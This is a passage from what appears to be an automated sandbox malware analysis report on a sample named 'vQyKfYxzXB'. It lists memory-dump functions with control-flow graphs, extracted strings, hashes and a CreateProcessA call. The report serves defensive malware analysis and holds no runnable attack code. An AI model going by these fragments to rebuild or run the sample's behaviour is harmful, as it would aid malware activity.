76f5ae7-76f5aed 1691->1698 1692->1702 1700 76f5afa-76f5b00 1693->1700 1701 76f5ada 1693->1701 1697->1657 1698->1702 1700->1702 1701->1657 1704 76f5c09-76f5c0d 1702->1704 1705 76f5b15-76f5b18 1702->1705 1704->1657 1708 76f5c0f-76f5c19 1704->1708 1706 76f5b1b-76f5b23 1705->1706 1706->1587 1709 76f5b29-76f5b2e 1706->1709 1708->1657 1710 76f5bff-76f5c03 1709->1710 1711 76f5b34-76f5b3d 1709->1711 1710->1704 1710->1706 1711->1587 1713 76f5b43-76f5b4e 1711->1713 1713->1710 1716 76f5b54-76f5b5a 1713->1716 1716->1587 1717 76f5b60-76f5b6f 1716->1717 1719 76f5b7d-76f5b8d 1717->1719 1720 76f5b71-76f5b78 1717->1720 1719->1587 1721 76f5b93-76f5ba2 1719->1721 1720->1710 1722 76f5ba4-76f5ba7 1721->1722 1723 76f5bb0-76f5bb3 1721->1723 1724 76f5bbc-76f5bbf 1722->1724 1725 76f5ba9-76f5bac 1722->1725 1726 76f5bc9-76f5bcf 1723->1726 1727 76f5bb5-76f5bb8 1723->1727 1732 76f5bd7-76f5bda 1724->1732 1728 76f5bae 1725->1728 1729 76f5bc1-76f5bc7 1725->1729 1726->1732 1730 76f5bba 1727->1730 1731 76f5bd1-76f5bd4 1727->1731 1728->1710 1729->1732 1730->1710 1731->1732 1733 76f5bdc-76f5be2 1732->1733 1734 76f5bea-76f5bf8 1732->1734 1733->1734 1735 76f5be4-76f5be8 1733->1735 1734->1710 1735->1710 1735->1734 1737->1611 1738->1611 1739->1609 1740->1609 1741->1676 1742->1676
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: LRq$LRq$LRq$LRq
                          • API String ID: 0-3399003930
                          • Opcode ID: d868d8ad1090d2123415caacd638acbfa5fecb05b5fb0c4ca9f8cc301ddffdbf
                          • Instruction ID: 9462956bff11d44eabb8261cee9e32c3d7c52727c235126f5aeb26c452408a74
                          • Opcode Fuzzy Hash: d868d8ad1090d2123415caacd638acbfa5fecb05b5fb0c4ca9f8cc301ddffdbf
                          • Instruction Fuzzy Hash: 9C323974A012068FDB14DF69D484AAEBBF2FF89300F158559E917AB366D730EC51CB90
                          Function 08D40E78 Relevance: 1.9, Strings: 1, Instructions: 639COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: V
                          • API String ID: 0-1342839628
                          • Opcode ID: 498b7bea72febf7c901fd1a2af0f0f53d032c0c7faad943cf63b6579d1a57801
                          • Instruction ID: 7872043943802a76d8bfeebaadad7d4f130b48e34e734a70dd27eb0b5afb6c2c
                          • Opcode Fuzzy Hash: 498b7bea72febf7c901fd1a2af0f0f53d032c0c7faad943cf63b6579d1a57801
                          • Instruction Fuzzy Hash: 39424870A00200CFDB15DF68C594A6ABBF2BF89342F55956DE946DB395DB30EC82CB90
                          Function 03133E28 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Pqq
                          • API String ID: 0-1334384951
                          • Opcode ID: afe2f737df17e99214c34b79f209bd7745b7959b4bcbd25e38c3506521c03943
                          • Instruction ID: bdfdf1fc20c071d13a83a11ec10ba599aaeae9a29236c17ddea9a0e7c26c5f9f
                          • Opcode Fuzzy Hash: afe2f737df17e99214c34b79f209bd7745b7959b4bcbd25e38c3506521c03943
                          • Instruction Fuzzy Hash: 6BD18F74E002188FDB54DFA9D984B9DBBB2FF89300F1481A9D809AB355DB31AD86CF51
                          Function 03137019 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Pqq
                          • API String ID: 0-1334384951
                          • Opcode ID: d4f167ff916a22b691e51c4c5cc22c7ebdd401c0fec2c6eb61124f6d38c8c669
                          • Instruction ID: 3bc3e4430a6c72a9cc6998986878d8049d715f448d87105b98d742a2adfd3453
                          • Opcode Fuzzy Hash: d4f167ff916a22b691e51c4c5cc22c7ebdd401c0fec2c6eb61124f6d38c8c669
                          • Instruction Fuzzy Hash: 28B18F74E002189FDB54DFA9D994A9DBBF2FF89300F1481AAD809AB365DB31AD41CF50
                          Function 076F4690 Relevance: .6, Instructions: 629COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c818503c75ab847327d03b1230ba0671f47e24dad470caf280498a4463298e14
                          • Instruction ID: 9e3393af754289ff101cfca5235dafac87b474c31a8b2a14ac3b61f0e20d5a99
                          • Opcode Fuzzy Hash: c818503c75ab847327d03b1230ba0671f47e24dad470caf280498a4463298e14
                          • Instruction Fuzzy Hash: EE4255B1A003818FDB258F75D48976ABFB6BF84305F544569E2438BBA1DF35E882CB50
                          Function 076F5058 Relevance: .5, Instructions: 505COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e7bc961b36a7bd297c09396ebb0dd83c08af2acca1c6d2d95e08c050839ec96c
                          • Instruction ID: 95a9d35a9c3f3e2500b729557ead99043e007fbffae5ef1235da098441ff7ad8
                          • Opcode Fuzzy Hash: e7bc961b36a7bd297c09396ebb0dd83c08af2acca1c6d2d95e08c050839ec96c
                          • Instruction Fuzzy Hash: E7123570A103008FD7289F69D899A6ABBF2FFC9302B54842DE58797795CF75AC42CB50
                          Function 08D40710 Relevance: .5, Instructions: 462COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72767ebc329c7ec1553487813d32567f72d9c7d4edcb0be38e2053c7792f51d5
                          • Instruction ID: a1e4e3e07aeb7024b713dd5135bce8a586c4b5d09dcad7c361e7c78bc2571dd3
                          • Opcode Fuzzy Hash: 72767ebc329c7ec1553487813d32567f72d9c7d4edcb0be38e2053c7792f51d5
                          • Instruction Fuzzy Hash: DE126B74A00705CFD754DF68C584AAABBF2FF88201B59C599E549DB362CB30ED46CB90
                          Function 076DDF29 Relevance: .4, Instructions: 405COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3494a3c9139492ac5b611402d6d5f8408ef64913cbcd6f9c482c8ab0c10b1677
                          • Instruction ID: a8551648f91de443886e58141d06254bc41afb4e6eeaa7c3d628387d40c414da
                          • Opcode Fuzzy Hash: 3494a3c9139492ac5b611402d6d5f8408ef64913cbcd6f9c482c8ab0c10b1677
                          • Instruction Fuzzy Hash: 96F189B1A10705DFDB25CF69C984AAABBF2BF48300F18856DE4569B761DB35EC42CB40
                          Function 076F2948 Relevance: .4, Instructions: 401COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c3feddd30be6954c25fd0b7fac83fd5bb266bd5c2d4bb9ed526efd523a44ab71
                          • Instruction ID: 9869c4e226597a1da1a46acf8ec0bafdf753e00051d8843a91a2715c7ce39bda
                          • Opcode Fuzzy Hash: c3feddd30be6954c25fd0b7fac83fd5bb266bd5c2d4bb9ed526efd523a44ab71
                          • Instruction Fuzzy Hash: 6BF14E74A10205CFDB18DFA5C894AAEBBB2FF89305F148569E906AB355DB34EC46CF40
                          Function 076F8C68 Relevance: 6.5, Strings: 5, Instructions: 258COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: $q$4cq$4cq$hq$hq
                          • API String ID: 0-1415917900
                          • Opcode ID: 013751fa34d16377bf28a0076e227d9198833a8f563e011296636e653831c420
                          • Instruction ID: 1d45f5c102d5f23f3213d57bd81893609b38e25be4259d5406da34f557e3a8da
                          • Opcode Fuzzy Hash: 013751fa34d16377bf28a0076e227d9198833a8f563e011296636e653831c420
                          • Instruction Fuzzy Hash: 14B12BB4A006068FDB24CF69C484B59BBF6FF88710F1984E9E54A9B365DB31EC85CB50
                          Function 076F9E68 Relevance: 3.9, Strings: 3, Instructions: 113COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1743 76f9e68-76f9e81 1744 76f9ebb-76f9ee0 1743->1744 1745 76f9e83-76f9e85 1743->1745 1746 76f9ee7-76f9f0c 1744->1746 1745->1746 1747 76f9e87-76f9e89 1745->1747 1750 76f9f13-76f9f6c 1746->1750 1749 76f9e8f-76f9e98 1747->1749 1747->1750 1751 76f9e9a-76f9ea4 1749->1751 1752 76f9ea6 1749->1752 1765 76f9f6e 1750->1765 1766 76f9f78-76f9fb2 1750->1766 1754 76f9ea8-76f9eab 1751->1754 1752->1754 1759 76f9eb3-76f9eb8 1754->1759 1765->1766
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: (q$(q$(q
                          • API String ID: 0-2103260149
                          • Opcode ID: f5faac578d32045dc3d5393f692bcec979df74448a92586dce4fd4c3d100e0b8
                          • Instruction ID: ca03bd7caa43cc478a49769eb3f43e1e645c35fbbd35f4f4456a9b861740a444
                          • Opcode Fuzzy Hash: f5faac578d32045dc3d5393f692bcec979df74448a92586dce4fd4c3d100e0b8
                          • Instruction Fuzzy Hash: 94311031B043114FD358AF79D840B5FBBE6EFC86603648229E80AEB354DE31EC0687A4
                          Function 076FC1B0 Relevance: 3.3, Instructions: 3263COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1812 76fc1b0-76fc218 1818 76fc26f-76fc291 1812->1818 1819 76fc21a-76fc25f 1812->1819 1822 76fc295-76fc2ac 1818->1822 1823 76fc293 1818->1823 2502 76fc261 call 76ffb70 1819->2502 2503 76fc261 call 76ffb20 1819->2503 1827 76fc2ae-76fc2b8 1822->1827 1828 76fc2b9-76fc44d 1822->1828 1823->1822 1852 76ffa2a-76ffa68 1828->1852 1853 76fc453-76fc4ad 1828->1853 1829 76fc267-76fc26e 1853->1852 1859 76fc4b3-76ff252 1853->1859 1859->1852 2410 76ff258-76ff2c7 1859->2410 2410->1852 2415 76ff2cd-76ff33c 2410->2415 2415->1852 2420 76ff342-76ff8bb 2415->2420 2420->1852 2485 76ff8c1-76ffa29 2420->2485 2502->1829 2503->1829
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 88e91a96190032a51c0ff34704986567d8776d70713d45bb608fe333ad4f4c18
                          • Instruction ID: a1756b236f056ce009215a7cef63d1985f11ec6def6d0d4eaa63ad9fb4529939
                          • Opcode Fuzzy Hash: 88e91a96190032a51c0ff34704986567d8776d70713d45bb608fe333ad4f4c18
                          • Instruction Fuzzy Hash: 7F634870A40218ABEB359F50CC56BAEBA72FB89700F5050A9E34A7B2D0DE751E81DF54
                          Function 076D9E50 Relevance: 3.1, Strings: 2, Instructions: 552COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2504 76d9e50-76d9e62 2505 76d9fed-76da019 2504->2505 2506 76d9e68-76d9e79 call 76d3ae0 2504->2506 2511 76da020-76da058 2505->2511 2510 76d9e7f-76d9ec8 call 76d3ae0 call 76d5678 call 76d57b0 2506->2510 2506->2511 2539 76d9eca-76d9ece 2510->2539 2540 76d9ed4-76d9efb call 76d0ef0 2510->2540 2516 76da05e-76da065 2511->2516 2517 76da378-76da3a4 2511->2517 2518 76da087-76da09c 2516->2518 2519 76da067-76da085 2516->2519 2542 76da3ab-76da3d7 2517->2542 2528 76da36e-76da375 2518->2528 2519->2518 2530 76da0a1-76da0f3 2519->2530 2544 76da0fd-76da0ff 2530->2544 2545 76da0f5-76da0f8 2530->2545 2539->2540 2543 76d9fd6-76d9fea 2539->2543 2560 76d9efd-76d9eff 2540->2560 2561 76d9f01 2540->2561 2558 76da3de-76da417 2542->2558 2547 76da26e-76da27b 2544->2547 2548 76da105-76da10a 2544->2548 2545->2528 2547->2542 2551 76da281-76da283 2547->2551 2554 76da113-76da115 2548->2554 2556 76da285-76da28a 2551->2556 2557 76da292-76da298 2551->2557 2562 76da268-76da26c 2554->2562 2563 76da11b-76da120 2554->2563 2556->2557 2557->2558 2559 76da29e-76da2a6 2557->2559 2581 76da419 2558->2581 2582 76da420-76da423 2558->2582 2564 76da2de-76da2e2 2559->2564 2565 76da2a8-76da2ac 2559->2565 2566 76d9f08-76d9f1a 2560->2566 2561->2566 2562->2547 2567 76da13a-76da13f 2563->2567 2568 76da122-76da135 2563->2568 2574 76da2e8 2564->2574 2575 76da2e4-76da2e6 2564->2575 2570 76da2ae-76da2c1 2565->2570 2571 76da2c6-76da2d9 2565->2571 2584 76d9f1c-76d9f20 2566->2584 2585 76d9f35-76d9f37 2566->2585 2567->2547 2572 76da145-76da14d 2567->2572 2568->2528 2570->2528 2571->2528 2579 76da14f-76da151 2572->2579 2580 76da1c5-76da1c7 2572->2580 2583 76da2ed-76da2ef 2574->2583 2575->2583 2587 76da157-76da159 2579->2587 2588 76da153-76da155 2579->2588 2589 76da1df-76da1e3 2580->2589 2590 76da1c9-76da1da 2580->2590 2581->2582 2591 76da4dd-76da4e3 2581->2591 2592 76da461-76da46d 2581->2592 2593 76da433-76da43d 2581->2593 2594 76da442-76da448 2581->2594 2595 76da472-76da47e 2581->2595 2596 76da4a2-76da4a8 2581->2596 2597 76da425-76da428 2582->2597 2598 76da483-76da48c 2582->2598 2600 76da306-76da31b 2583->2600 2601 76da2f1-76da304 2583->2601 2584->2585 2605 76d9f22-76d9f2b 2584->2605 2608 76d9f59-76d9f5b 2585->2608 2609 76d9f39-76d9f40 2585->2609 2614 76da168-76da16e 2587->2614 2615 76da15b-76da160 2587->2615 2613 76da1bd-76da1c3 2588->2613 2589->2547 2610 76da1e9-76da1eb 2589->2610 2590->2528 2611 76da4eb-76da4f7 2591->2611 2612 76da4e5 2591->2612 2602 76da502-76da50b 2592->2602 2593->2602 2618 76da44a 2594->2618 2619 76da450-76da45c 2594->2619 2595->2602 2606 76da4aa 2596->2606 2607 76da4b0-76da4bc 2596->2607 2616 76da4be-76da4c7 2597->2616 2617 76da42e-76da4ff 2597->2617 2603 76da48e 2598->2603 2604 76da494-76da4a0 2598->2604 2637 76da31d-76da35a 2600->2637 2638 76da35c-76da369 2600->2638 2601->2528 2603->2604 2604->2602 2671 76d9f2d call 76d9e40 2605->2671 2672 76d9f2d call 76d9e50 2605->2672 2606->2607 2607->2602 2627 76d9f5d-76d9f84 call 76d0ef0 2608->2627 2628 76d9fcc-76d9fd3 2608->2628 2620 76d9f49 2609->2620 2621 76d9f42-76d9f47 2609->2621 2625 76da1ed-76da1ef 2610->2625 2626 76da25e-76da264 2610->2626 2611->2602 2612->2611 2613->2579 2613->2580 2614->2558 2631 76da174-76da180 2614->2631 2615->2614 2622 76da4cf-76da4db 2616->2622 2623 76da4c9 2616->2623 2618->2619 2619->2602 2634 76d9f4e-76d9f57 2620->2634 2621->2634 2622->2602 2623->2622 2635 76da1fe-76da204 2625->2635 2636 76da1f1-76da1f6 2625->2636 2626->2610 2639 76da266 2626->2639 2655 76d9f8a-76d9f91 2627->2655 2656 76d9f86-76d9f88 2627->2656 2640 76da18f-76da195 2631->2640 2641 76da182-76da187 2631->2641 2633 76d9f33 2633->2585 2634->2608 2635->2558 2643 76da20a-76da216 2635->2643 2636->2635 2637->2638 2638->2528 2639->2547 2640->2558 2644 76da19b-76da1b0 2640->2644 2641->2640 2647 76da218-76da21d 2643->2647 2648 76da225-76da22b 2643->2648 2653 76da1b7-76da1b9 2644->2653 2654 76da1b2-76da1b5 2644->2654 2647->2648 2648->2558 2652 76da231-76da246 2648->2652 2652->2626 2662 76da248-76da259 2652->2662 2653->2613 2658 76da1bb 2653->2658 2654->2613 2659 76d9f93-76d9fca call 76d6b60 2655->2659 2656->2659 2658->2613 2659->2628 2662->2528 2671->2633 2672->2633
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: 7$Hq
                          • API String ID: 0-2358524199
                          • Opcode ID: 0bc4d9ebce0e5d9619653c22b2de38c0cb848044027d812a9e45359dcfed6d5c
                          • Instruction ID: 9694685ec68e35283f09898bb974a220f1aaa0e270e5116b66a1404564a66e7b
                          • Opcode Fuzzy Hash: 0bc4d9ebce0e5d9619653c22b2de38c0cb848044027d812a9e45359dcfed6d5c
                          • Instruction Fuzzy Hash: B622AFB0A242058FDB15CFA4C884BAEBBB2FF89300F15C569E4069B354DB35ED42CB95
                          Function 076D3978 Relevance: 2.7, Strings: 2, Instructions: 228COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2673 76d3978-76d398c 2674 76d3a91-76d3abd 2673->2674 2675 76d3992-76d39bd 2673->2675 2680 76d3ac4-76d3ae7 2674->2680 2675->2680 2681 76d39c3-76d39e6 2675->2681 2686 76d3b09-76d3b0c 2680->2686 2687 76d3ae9-76d3aeb 2680->2687 2681->2680 2693 76d39ec-76d3a6f 2681->2693 2689 76d3c6c 2686->2689 2690 76d3b12-76d3b18 2686->2690 2691 76d3aed-76d3af0 2687->2691 2692 76d3b34-76d3b39 2687->2692 2699 76d3c71-76d3c74 2689->2699 2694 76d3b1a 2690->2694 2695 76d3b21-76d3b27 2690->2695 2696 76d3bb6-76d3bbc 2691->2696 2697 76d3af6-76d3afc 2691->2697 2698 76d3b3e-76d3b43 2692->2698 2692->2699 2752 76d3a75-76d3a7f 2693->2752 2753 76d3a71 2693->2753 2694->2695 2700 76d3c2d-76d3c32 2694->2700 2701 76d3c0a-76d3c0f 2694->2701 2702 76d3c65-76d3c6a 2694->2702 2703 76d3c26-76d3c2b 2694->2703 2704 76d3c03-76d3c08 2694->2704 2705 76d3bfc-76d3c01 2694->2705 2706 76d3c1f-76d3c24 2694->2706 2707 76d3c5e-76d3c63 2694->2707 2708 76d3c18-76d3c1d 2694->2708 2709 76d3c75-76d3cae 2694->2709 2710 76d3bf5-76d3bfa 2694->2710 2711 76d3c34-76d3c39 2694->2711 2712 76d3c57-76d3c5c 2694->2712 2713 76d3c11-76d3c16 2694->2713 2714 76d3c50-76d3c55 2694->2714 2695->2709 2717 76d3b2d 2695->2717 2715 76d3bbe-76d3bc3 2696->2715 2716 76d3bc8-76d3bcd 2696->2716 2697->2709 2718 76d3b02 2697->2718 2698->2699 2700->2699 2701->2699 2702->2699 2703->2699 2704->2699 2705->2699 2706->2699 2707->2699 2708->2699 2710->2699 2711->2699 2712->2699 2713->2699 2714->2699 2715->2699 2716->2699 2720 76d3bd2-76d3bd7 2716->2720 2717->2692 2717->2707 2717->2712 2717->2714 2718->2698 2718->2700 2718->2701 2718->2702 2718->2703 2718->2704 2718->2705 2718->2706 2718->2707 2718->2708 2718->2709 2718->2710 2718->2711 2718->2712 2718->2713 2718->2714 2718->2720 2721 76d3bac-76d3bb1 2718->2721 2722 76d3b66-76d3b6b 2718->2722 2723 76d3ba2-76d3ba7 2718->2723 2724 76d3c3b-76d3c40 2718->2724 2725 76d3b7a-76d3b7f 2718->2725 2726 76d3b70-76d3b75 2718->2726 2727 76d3b8e-76d3b93 2718->2727 2728 76d3c49-76d3c4e 2718->2728 2729 76d3b48-76d3b4d 2718->2729 2730 76d3b84-76d3b89 2718->2730 2731 76d3c42-76d3c47 2718->2731 2732 76d3b5c-76d3b61 2718->2732 2733 76d3bdc-76d3be2 2718->2733 2734 76d3b98-76d3b9d 2718->2734 2735 76d3b52-76d3b57 2718->2735 2720->2699 2721->2699 2722->2699 2723->2699 2724->2699 2725->2699 2726->2699 2727->2699 2728->2699 2729->2699 2730->2699 2731->2699 2732->2699 2737 76d3bee-76d3bf3 2733->2737 2738 76d3be4-76d3be9 2733->2738 2734->2699 2735->2699 2737->2699 2737->2710 2738->2699 2755 76d3a81 call 76d5b20 2752->2755 2756 76d3a81 call 76d5b10 2752->2756 2753->2752 2754 76d3a87-76d3a8e 2755->2754 2756->2754
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hq$U
                          • API String ID: 0-3764088092
                          • Opcode ID: 3508a2a502fa332602a195101ab7c2e4a907219a30bd251187bdd5308648c750
                          • Instruction ID: 1ae2807ff0f9bafbc45e731727b13532df2dbd5b5325e0526f5909f7f3fbe88c
                          • Opcode Fuzzy Hash: 3508a2a502fa332602a195101ab7c2e4a907219a30bd251187bdd5308648c750
                          • Instruction Fuzzy Hash: B98191F8F38205CBD7148A2AD4547797BA1EB46341F04856AEC47CB3A1CA38DD46EB53
                          Function 08D4EBB8 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2886 8d4ebb8-8d4ec29 2893 8d4ec31-8d4ec37 2886->2893 2920 8d4ec3a call 8d4edf6 2893->2920 2921 8d4ec3a call 8f912da 2893->2921 2922 8d4ec3a call 8ee0d78 2893->2922 2923 8d4ec3a call 8d4eff8 2893->2923 2924 8d4ec3a call 8d4f188 2893->2924 2894 8d4ec40-8d4ec68 call 8d4ddc0 2900 8d4ec6c-8d4ec78 2894->2900 2901 8d4ec6a 2894->2901 2902 8d4ec7a-8d4ede8 2900->2902 2901->2902 2920->2894 2921->2894 2922->2894 2923->2894 2924->2894
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: %*&/)(#$^@!~-_$0,Aq
                          • API String ID: 0-2017700313
                          • Opcode ID: fa37030b9b205da08eae406b154467c2d70053d0e1b6e26e088f61bd047f9d1e
                          • Instruction ID: 995593049ae40b4106064f5de544661e77b6f586faa0f4f09e39b162a33e6d5f
                          • Opcode Fuzzy Hash: fa37030b9b205da08eae406b154467c2d70053d0e1b6e26e088f61bd047f9d1e
                          • Instruction Fuzzy Hash: 9751D331F00214AFD700BB64E44579EBBB2FF89301F1489A8D9859B396DF31AD5ACB81
                          Function 08D4EBC0 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: %*&/)(#$^@!~-_$0,Aq
                          • API String ID: 0-2017700313
                          • Opcode ID: 678ac22a65f8e0710968622bb58097819dd08e246e9524191b2a4ba46df48fda
                          • Instruction ID: b3f2aaaf4ab83ea7029345b07d5cd1c2c1f47efa7401f796e6b763f8b6d7daa4
                          • Opcode Fuzzy Hash: 678ac22a65f8e0710968622bb58097819dd08e246e9524191b2a4ba46df48fda
                          • Instruction Fuzzy Hash: 0C51C331F00214AFD700BB68D4457AEBBB2FF89301F1489A8D9859B396DF71AD568B81
                          Function 08D40CBA Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$V
                          • API String ID: 0-4231741877
                          • Opcode ID: 84c3c3814df88a259783fdc313675064bcb60c56886e386fe0f32b34e42ffb28
                          • Instruction ID: 9ba0b033ae916428ed4c7b1146d3262fdebce5f9fa67d38d3f25d91dcc67cdbf
                          • Opcode Fuzzy Hash: 84c3c3814df88a259783fdc313675064bcb60c56886e386fe0f32b34e42ffb28
                          • Instruction Fuzzy Hash: 5D21A172A00219DFCB55CFA8C980AEFBBF5BF89211B04816AE604DB251D7309E56CB90
                          Function 08D4F188 Relevance: 2.5, Strings: 2, Instructions: 12COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: $q$$q
                          • API String ID: 0-3126353813
                          • Opcode ID: e4e89f75040883ede1474489f4f06cae8bc15cd96f33bd449c4d0a463cc143cc
                          • Instruction ID: 362e6105ca6e7e36ae676fa3bba7eea426436712dd1cb745cee514f5a69c8b5c
                          • Opcode Fuzzy Hash: e4e89f75040883ede1474489f4f06cae8bc15cd96f33bd449c4d0a463cc143cc
                          • Instruction Fuzzy Hash: 72D01212A5470ADFAA3D8B26BC052A636547E60B723566356D833866F5DE11C443C261
                          Function 08D424C0 Relevance: 1.9, Strings: 1, Instructions: 602COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hbq
                          • API String ID: 0-2269934739
                          • Opcode ID: 1534969a1be8c2026614149ebe25ae999bdc1a1b54b09e10304043502dace3c4
                          • Instruction ID: d8550b412e6c6cb51ffa5829c7fc682c19b576d6d2cf380a3448b8385e18f281
                          • Opcode Fuzzy Hash: 1534969a1be8c2026614149ebe25ae999bdc1a1b54b09e10304043502dace3c4
                          • Instruction Fuzzy Hash: D8426D74A00205DFCB14DF68C584A9EBBF2FF88351F159699E845AB361DB30ED46CB90
                          Function 08EED365 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08EED5A6
                          Memory Dump Source
